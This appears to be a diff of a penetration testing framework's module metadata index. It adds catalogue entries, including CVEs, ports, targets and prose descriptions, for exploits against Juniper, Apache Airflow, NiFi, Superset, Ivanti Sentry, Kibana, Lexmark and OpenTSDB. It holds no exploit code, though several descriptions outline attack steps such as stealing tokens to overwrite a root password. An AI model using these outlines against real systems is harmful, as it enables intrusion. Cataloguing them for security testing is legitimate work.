+    "description": "This module exploits a memory disclosure vulnerability in Elasticsearch\n          7.10.0 to 7.13.3 (inclusive). A user with the ability to submit arbitrary\n          queries to Elasticsearch can generate an error message containing previously\n          used portions of a data buffer.\n          This buffer could contain sensitive information such as Elasticsearch\n          documents or authentication details. This vulnerability's output is similar\n          to heartbleed.",
+    "references": [
+      "EDB-50149",
+      "CVE-2021-22145",
+      "URL-https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9200,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-09-01 20:14:41 +0000",
+    "path": "/modules/auxiliary/scanner/http/elasticsearch_memory_disclosure.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/elasticsearch_memory_disclosure",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/elasticsearch_traversal": {
    "name": "ElasticSearch Snapshot API Directory Traversal",
    "fullname": "auxiliary/scanner/http/elasticsearch_traversal",
@@ -29032,7 +29470,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-09-18 06:56:18 +0000",
    "path": "/modules/auxiliary/scanner/http/emby_ssrf_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/emby_ssrf_scanner",
@@ -29040,6 +29478,18 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "RelatedModules": [
+        "auxiliary/scanner/http/emby_version_ssrf"
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -29080,7 +29530,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-09-18 06:56:18 +0000",
    "path": "/modules/auxiliary/scanner/http/emby_version_ssrf.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/emby_version_ssrf",
@@ -29088,6 +29538,18 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "RelatedModules": [
+        "auxiliary/scanner/http/emby_ssrf_scanner"
+      ]
    },
    "session_types": false,
    "needs_cleanup": false
@@ -40354,6 +40816,53 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/ldap/ldap_login": {
+    "name": "LDAP Login Scanner",
+    "fullname": "auxiliary/scanner/ldap/ldap_login",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Dean Welch"
+    ],
+    "description": "This module attempts to login to the LDAP service.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 389,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2023-10-02 13:23:15 +0000",
+    "path": "/modules/auxiliary/scanner/ldap/ldap_login.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/ldap/ldap_login",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/llmnr/query": {
    "name": "LLMNR Query",
    "fullname": "auxiliary/scanner/llmnr/query",
@@ -41839,6 +42348,60 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/msmq/cve_2023_21554_queuejumper": {
+    "name": "CVE-2023-21554 - QueueJumper - MSMQ RCE Check",
+    "fullname": "auxiliary/scanner/msmq/cve_2023_21554_queuejumper",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-04-11",
+    "type": "auxiliary",
+    "author": [
+      "Wayne Low",
+      "Haifei Li",
+      "Bastian Kanbach <bastian.kanbach@securesystems.de>"
+    ],
+    "description": "This module checks the provided hosts for the CVE-2023-21554 vulnerability by sending\n          a MSMQ message with an altered DataLength field within the SRMPEnvelopeHeader that\n          overflows the given buffer. On patched systems, the error is caught and no response\n          is sent back. On vulnerable systems, the integer wraps around and depending on the length\n          could cause an out-of-bounds write. In the context of this module a response is sent back,\n          which indicates that the system is vulnerable.",
+    "references": [
+      "CVE-2023-21554",
+      "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554",
+      "URL-https://securityintelligence.com/posts/msmq-queuejumper-rce-vulnerability-technical-analysis/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 1801,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2023-09-05 13:15:36 +0000",
+    "path": "/modules/auxiliary/scanner/msmq/cve_2023_21554_queuejumper.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/msmq/cve_2023_21554_queuejumper",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "AKA": [
+        "QueueJumper"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/mssql/mssql_hashdump": {
    "name": "MSSQL Password Hashdump",
    "fullname": "auxiliary/scanner/mssql/mssql_hashdump",
@@ -42052,7 +42615,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-08-17 23:15:38 +0000",
+    "mod_time": "2023-10-12 17:39:47 +0000",
    "path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_authbypass_hashdump",
@@ -42091,7 +42654,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-08-17 19:07:28 +0000",
    "path": "/modules/auxiliary/scanner/mysql/mysql_file_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_file_enum",
@@ -42281,7 +42844,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-08-17 19:07:28 +0000",
    "path": "/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_writable_dirs",
@@ -48205,7 +48768,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2023-06-14 00:40:33 +0000",
+    "mod_time": "2023-09-20 13:52:06 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
@@ -48524,7 +49087,7 @@
      "smtps"
    ],
    "targets": null,
-    "mod_time": "2023-01-04 14:45:58 +0000",
+    "mod_time": "2023-09-18 19:33:07 +0000",
    "path": "/modules/auxiliary/scanner/smtp/smtp_relay.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_relay",
@@ -50030,7 +50593,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-11-05 07:23:14 +0000",
+    "mod_time": "2023-08-28 16:49:31 +0000",
    "path": "/modules/auxiliary/scanner/ssl/ssl_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssl/ssl_version",
@@ -58913,6 +59476,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_freebsd/http/junos_phprc_auto_prepend_file": {
+    "name": "Junos OS PHPRC Environment Variable Manipulation RCE",
+    "fullname": "exploit/freebsd/http/junos_phprc_auto_prepend_file",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-08-17",
+    "type": "exploit",
+    "author": [
+      "Jacob Baines",
+      "Ron Bowes",
+      "jheysel-r7"
+    ],
+    "description": "This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls\n          and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin\n          by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being\n          'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP\n          function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling\n          allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses\n          data:// to provide a file inline which includes the base64 encoded PHP payload.\n\n          By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a\n          datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated\n          to the J-Web application, in order to overwrite the the root password hash. If there is no user\n          authenticated to the J-Web application this method will not work. The module then authenticates\n          with the new root password over SSH and then rewrites the original root password hash to /etc/master.passwd.",
+    "references": [
+      "URL-https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/",
+      "URL-https://vulncheck.com/blog/juniper-cve-2023-36845",
+      "URL-https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US",
+      "CVE-2023-36845"
+    ],
+    "platform": "PHP,Unix",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP In-Memory",
+      "Interactive SSH with jail break"
+    ],
+    "mod_time": "2023-09-29 11:40:03 +0000",
+    "path": "/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb",
+    "is_install_path": true,
+    "ref_name": "freebsd/http/junos_phprc_auto_prepend_file",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "config-changes"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_freebsd/http/watchguard_cmd_exec": {
    "name": "Watchguard XCS Remote Command Execution",
    "fullname": "exploit/freebsd/http/watchguard_cmd_exec",
@@ -60169,6 +60796,72 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/apache_airflow_dag_rce": {
+    "name": "Apache Airflow 1.10.10 - Example DAG Remote Code Execution",
+    "fullname": "exploit/linux/http/apache_airflow_dag_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-07-14",
+    "type": "exploit",
+    "author": [
+      "xuxiang",
+      "Pepe Berba",
+      "Ismail E. Dawoodjee"
+    ],
+    "description": "This module exploits an unauthenticated command injection vulnerability\n          by combining two critical vulnerabilities in Apache Airflow 1.10.10.\n          The first, CVE-2020-11978, is an authenticated command injection vulnerability\n          found in one of Airflow's example DAGs, \"example_trigger_target_dag\", which\n          allows any authenticated user to run arbitrary OS commands as the user\n          running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default\n          setting of Airflow 1.10.10 that allows unauthenticated access to Airflow's\n          Experimental REST API to perform malicious actions such as creating the\n          vulnerable DAG above. The two CVEs taken together allow vulnerable DAG creation\n          and command injection, leading to unauthenticated remote code execution.",
+    "references": [
+      "EDB-49927",
+      "CVE-2020-11978",
+      "CVE-2020-13927",
+      "URL-https://github.com/pberba/CVE-2020-11978/",
+      "URL-https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx",
+      "URL-https://lists.apache.org/thread/mq1bpqf3ztg1nhyc5qbrjobfrzttwx1d"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command"
+    ],
+    "mod_time": "2023-09-17 22:42:07 +0000",
+    "path": "/modules/exploits/linux/http/apache_airflow_dag_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/apache_airflow_dag_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/apache_continuum_cmd_exec": {
    "name": "Apache Continuum Arbitrary Command Execution",
    "fullname": "exploit/linux/http/apache_continuum_cmd_exec",
@@ -60339,6 +61032,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/apache_nifi_h2_rce": {
+    "name": "Apache NiFi H2 Connection String Remote Code Execution",
+    "fullname": "exploit/linux/http/apache_nifi_h2_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-06-12",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Matei \"Mal\" Badanoiu"
+    ],
+    "description": "The DBCPConnectionPool and HikariCPConnectionPool Controller Services in\n          Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user\n          to configure a Database URL with the H2 driver that enables custom code execution.\n\n          This exploit will result in several shells (5-7).\n          Successfully tested against Apache nifi 1.17.0 through 1.21.0.",
+    "references": [
+      "CVE-2023-34468",
+      "URL-https://lists.apache.org/thread/7b82l4f5blmpkfcynf3y6z4x1vqo59h8",
+      "URL-https://issues.apache.org/jira/browse/NIFI-11653",
+      "URL-https://nifi.apache.org/security.html#1.22.0"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 8443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix (In-Memory)"
+    ],
+    "mod_time": "2023-08-28 17:39:02 +0000",
+    "path": "/modules/exploits/linux/http/apache_nifi_h2_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/apache_nifi_h2_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/apache_ofbiz_deserialization": {
    "name": "Apache OFBiz XML-RPC Java Deserialization",
    "fullname": "exploit/linux/http/apache_ofbiz_deserialization",
@@ -60529,6 +61286,78 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/apache_superset_cookie_sig_rce": {
+    "name": "Apache Superset Signed Cookie RCE",
+    "fullname": "exploit/linux/http/apache_superset_cookie_sig_rce",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2023-09-06",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "paradoxis",
+      "Spencer McIntyre",
+      "Naveen Sunkavally"
+    ],
+    "description": "Apache Superset versions <= 2.0.0 utilize Flask with a known default secret key which is used to sign HTTP cookies.\n          These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their user_id to that\n          of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user. From there the\n          Superset database is mounted, and credentials are pulled. A dashboard is then created. Lastly a pickled python payload can be\n          set for that dashboard within Superset's database which will trigger the RCE.\n\n          An attempt to clean up ALL of the dashboard key values and reset them to their previous values happens during the cleanup phase.",
+    "references": [
+      "URL-https://github.com/Paradoxis/Flask-Unsign",
+      "URL-https://vulcan.io/blog/cve-2023-27524-in-apache-superset-what-you-need-to-know/",
+      "URL-https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/",
+      "URL-https://www.horizon3.ai/apache-superset-part-ii-rce-credential-harvesting-and-more/",
+      "URL-https://github.com/horizon3ai/CVE-2023-27524/blob/main/CVE-2023-27524.py",
+      "EDB-51447",
+      "CVE-2023-27524",
+      "CVE-2023-37941",
+      "CVE-2023-39265"
+    ],
+    "platform": "Python",
+    "arch": "python",
+    "rport": 8088,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2023-10-10 15:21:35 +0000",
+    "path": "/modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/apache_superset_cookie_sig_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "config-changes"
+      ],
+      "RelatedModules": [
+        "auxiliary/gather/apache_superset_cookie_sig_priv_esc"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection": {
    "name": "Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection",
    "fullname": "exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection",
@@ -66278,6 +67107,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/ivanti_sentry_misc_log_service": {
+    "name": "Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)",
+    "fullname": "exploit/linux/http/ivanti_sentry_misc_log_service",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-08-21",
+    "type": "exploit",
+    "author": [
+      "Zach Hanley",
+      "James Horseman",
+      "jheysel-r7"
+    ],
+    "description": "This module exploits an authentication bypass in Ivanti Sentry which exposes API functionality which\n          allows for code execution in the context of the root user.",
+    "references": [
+      "URL-https://github.com/horizon3ai/CVE-2023-38035",
+      "URL-https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/",
+      "CVE-2023-38035"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x64",
+    "rport": 8443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix (In-Memory)",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-09-12 15:14:10 +0000",
+    "path": "/modules/exploits/linux/http/ivanti_sentry_misc_log_service.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/ivanti_sentry_misc_log_service",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/jenkins_cli_deserialization": {
    "name": "Jenkins CLI Deserialization",
    "fullname": "exploit/linux/http/jenkins_cli_deserialization",
@@ -66440,6 +67333,128 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/kibana_timelion_prototype_pollution_rce": {
+    "name": "Kibana Timelion Prototype Pollution RCE",
+    "fullname": "exploit/linux/http/kibana_timelion_prototype_pollution_rce",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2019-10-30",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Michał Bentkowski",
+      "Gaetan Ferry"
+    ],
+    "description": "Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer.\n          An attacker with access to the Timelion application could send a request that will attempt to execute\n          javascript code. This leads to an arbitrary command execution with permissions of the\n          Kibana process on the host system.\n\n          Exploitation will require a service or system reboot to restore normal operation.\n\n          The WFSDELAY parameter is crucial for this exploit. Setting it too high will cause MANY shells\n          (50-100+), while setting it too low will cause no shells to be obtained. WFSDELAY of 10 for a\n          docker image caused 6 shells.\n\n          Tested against kibana 6.5.4.",
+    "references": [
+      "URL-https://github.com/mpgn/CVE-2019-7609",
+      "URL-https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/",
+      "CVE-2019-7609"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 5601,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2023-09-01 20:34:35 +0000",
+    "path": "/modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/kibana_timelion_prototype_pollution_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
+  "exploit_linux/http/kibana_upgrade_assistant_telemetry_rce": {
+    "name": "Kibana Upgrade Assistant Telemetry Collector Prototype Pollution",
+    "fullname": "exploit/linux/http/kibana_upgrade_assistant_telemetry_rce",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2020-04-17",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Alex Brasetvik (alexbrasetvik)"
+    ],
+    "description": "Kibana before version 7.6.3 suffers from a prototype pollution bug within the\n          Upgrade Assistant. By setting a new constructor.prototype.sourceURL value we're\n          able to execute arbitrary code.\n          Code execution is possible through two different ways. Either by sending data\n          directly to Elastic, or using Kibana to submit the same queries. Either method\n          enters the polluted prototype for Kibana to read.\n\n          Kibana will either need to be restarted, or collection happens (unknown time) for\n          the payload to execute. Once it does, cleanup must delete the .kibana_1 index\n          for Kibana to restart successfully. Once a callback does occur, cleanup will\n          happen allowing Kibana to be successfully restarted on next attempt.",
+    "references": [
+      "URL-https://hackerone.com/reports/852613"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": 9200,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "ELASTIC",
+      "KIBANA"
+    ],
+    "mod_time": "2023-10-06 09:55:10 +0000",
+    "path": "/modules/exploits/linux/http/kibana_upgrade_assistant_telemetry_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/kibana_upgrade_assistant_telemetry_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/klog_server_authenticate_user_unauth_command_injection": {
    "name": "Klog Server authenticate.php user Unauthenticated Command Injection",
    "fullname": "exploit/linux/http/klog_server_authenticate_user_unauth_command_injection",
@@ -66562,6 +67577,69 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/lexmark_faxtrace_settings": {
+    "name": "Lexmark Device Embedded Web Server RCE",
+    "fullname": "exploit/linux/http/lexmark_faxtrace_settings",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-03-13",
+    "type": "exploit",
+    "author": [
+      "James Horseman",
+      "Zach Hanley",
+      "jheysel-r7"
+    ],
+    "description": "A unauthenticated Remote Code Execution vulnerability exists in the embedded webserver in certain Lexmark devices through 2023-02-19.\n          The vulnerability is only exposed if, when setting up the printer or device, the user selects \"Set up Later\" when asked\n          if they would like to add an Admin user. If no Admin user is created the endpoint `/cgi-bin/fax_change_faxtrace_settings`\n          is accessible without authentication. The endpoint allows the user to configure a number of different fax settings.\n\n          A number of the configurable parameters on the page (ex. `FT_Custom_lbtrace`) fail to be sanitized properly before being\n          used in an bash eval statement: `eval \"$cmd\" > /dev/null`, allowing for an unauthenticated user to run arbitrary commands.",
+    "references": [
+      "URL-https://github.com/horizon3ai/CVE-2023-26067",
+      "URL-https://publications.lexmark.com/publications/security-alerts/CVE-2023-26068.pdf",
+      "URL-https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/",
+      "CVE-2023-26068"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix (In-Memory)"
+    ],
+    "mod_time": "2023-09-06 15:47:54 +0000",
+    "path": "/modules/exploits/linux/http/lexmark_faxtrace_settings.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/lexmark_faxtrace_settings",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/librenms_addhost_cmd_inject": {
    "name": "LibreNMS addhost Command Injection",
    "fullname": "exploit/linux/http/librenms_addhost_cmd_inject",
@@ -69275,6 +70353,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/opentsdb_key_cmd_injection": {
+    "name": "OpenTSDB 2.4.1 unauthenticated command injection",
+    "fullname": "exploit/linux/http/opentsdb_key_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-07-01",
+    "type": "exploit",
+    "author": [
+      "Gal Goldstein",
+      "Daniel Abeles",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits an unauthenticated command injection\n          vulnerability in the key parameter in OpenTSDB through\n          2.4.1 (CVE-2023-36812/CVE-2023-25826) in order to achieve\n          unauthenticated remote code execution as the root user.\n\n          The module first attempts to obtain the OpenTSDB version via\n          the api. If the version is 2.4.1 or lower, the module\n          performs additional checks to obtain the configured metrics\n          and aggregators. It then randomly selects one metric and one\n          aggregator and uses those to instruct the target server to\n          plot a graph. As part of this request, the key parameter is\n          set to the payload, which will then be executed by the target\n          if the latter is vulnerable.\n\n          This module has been successfully tested against OpenTSDB\n          version 2.4.1.",
+    "references": [
+      "URL-https://github.com/OpenTSDB/opentsdb/security/advisories/GHSA-76f7-9v52-v2fw",
+      "CVE-2023-36812",
+      "CVE-2023-25826"
+    ],
+    "platform": "Linux",
+    "arch": "ARCH_CMD",
+    "rport": 4242,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux"
+    ],
+    "mod_time": "2023-09-07 17:29:16 +0000",
+    "path": "/modules/exploits/linux/http/opentsdb_key_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/opentsdb_key_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/opentsdb_yrange_cmd_injection": {
    "name": "OpenTSDB 2.4.0 unauthenticated command injection",
    "fullname": "exploit/linux/http/opentsdb_yrange_cmd_injection",
@@ -71190,6 +72331,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/solarview_unauth_rce_cve_2023_23333": {
+    "name": "SolarView Compact unauthenticated remote command execution vulnerability.",
+    "fullname": "exploit/linux/http/solarview_unauth_rce_cve_2023_23333",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-05-15",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>"
+    ],
+    "description": "CONTEC's SolarView™ Series enables you to monitor and visualize solar power and is only available in Japan.\n          This module exploits a command injection vulnerability on the SolarView Compact `v6.00` web application\n          via vulnerable endpoint `downloader.php`.\n          After exploitation, an attacker will have full access with the same user privileges under\n          which the webserver is running (typically as user `contec`).",
+    "references": [
+      "CVE-2023-23333",
+      "URL-https://attackerkb.com/topics/kE3lzTZGV2/cve-2023-23333"
+    ],
+    "platform": "Linux,PHP,Unix",
+    "arch": "php, cmd, armle, x64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-09-05 17:06:01 +0000",
+    "path": "/modules/exploits/linux/http/solarview_unauth_rce_cve_2023_23333.rb",
+    "is_install_path": true,
